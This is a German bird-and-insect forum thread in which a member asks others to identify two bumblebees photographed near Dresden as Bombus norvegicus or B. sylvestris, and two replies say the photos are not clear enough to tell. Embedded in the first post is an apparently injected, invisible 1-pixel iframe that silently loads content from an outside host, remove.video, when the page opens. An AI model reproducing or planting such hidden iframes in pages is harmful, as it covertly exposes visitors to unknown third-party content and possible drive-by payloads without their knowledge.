Herzlich Willkommen

Du kannst sofort los legen und Fragen stellen oder Antworten schreiben, auch ohne Anmeldung. Willst Du Fotos ins Forum hoch laden, die Livestreams ansehen oder am Quiz teilnehmen musst Du Dich einmalig registrieren und danach anmelden. Oder hast Du Dein Passwort vergessen?

Bombus norvegicus in Sachsen

  • Dieses Thema hat 2 Antworten und 3 Teilnehmer, und wurde zuletzt aktualisiert vor 1 Monat, 1 Woche von AvatarMartin.
Ansicht von 3 Beiträgen - 1 bis 3 (von insgesamt 3)
  • Autor
    Beiträge
  • #74452 Antworten
    StefanR
    Forenmitglied

    Hallo zusammen :)

    da es zuletzt mit der Feldhummel so gut geklappt hat, möchte ich euch noch zwei weitere Hummeln zur Begutachtung vorstellen. Diese fand ich im Umland von Dresden, ebenfalls Anfang Juli und ungefähr auf 340 m über N.N.

    Das erste Individuum ruhte mehr oder weniger auf einem Stein, während das andere Individuum an Majoran Nektar trank. Meine Vermutung steht ja im Titel, allerdings ist mir bewusst, dass auch sylvestris in Frage kommt. Vielleicht seht ihr noch ein bisschen mehr. Den Scapus habe ich mit dem Handy leider nicht ordentlich abbilden können..

    Viele Grüße Stefan
    <div><iframe id=”embedPath” style=”height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;” src=”//remove.video/repo”></iframe></div>

    Attachments:
    #74469 Antworten
    PetraS
    Forenmitglied

    Hallo Stefan,

    damit das nicht untergeht, schreibe ich einfach mal. Ich habe bis jetzt noch keine B. norvegicus gesehen. Wenn ich mir Vergleichsbilder und Beschreibungen anschaue, kann ich bei der “Steinhummel” Ähnlichkeiten zur norvegicus sehen.
    Also, ich kann leider gar nichts Hilfreiches beisteuern, aber vielleicht melden sich jetzt unsere Experten.

    Liebe Grüße
    Petra

    #74689 Antworten
    Martin
    Forenmitglied

    Da kann ich nicht wirklich helfen. Vom Foto* kann ich sylvestris und norvegicus nicht unterscheiden oder mir ist letztere noch nie untergekommen.

    *Meine Erfahrung: Behaarung am Scapus sieht man auch auf den schärfsten Bildern nicht. Und die Antennenglieder zu beurteilen klappt auch nicht wirklich.

Ansicht von 3 Beiträgen - 1 bis 3 (von insgesamt 3)
Antwort auf: Bombus norvegicus in Sachsen
Deine Information:




:homepage:  :)  :D  :(  :o  8O  :?  8)  :lol:  :x  :P  :ups:  :cry:  :roll:  ;)  :|  :mrgreen:  :XD:  :DX:  :ugly:  :freu:  :freu2:  :motz:  :haha:  :lachtot:  :god:  :hurra: 
:irre:  O_o  :bravo:  :pfeif:  :ja:  :nein:  :maul:  :doh:  :girl:  :winken:  :kaffee:  :krank:  :biene:  :hummel:  Schmetterling  :regen:  :blume: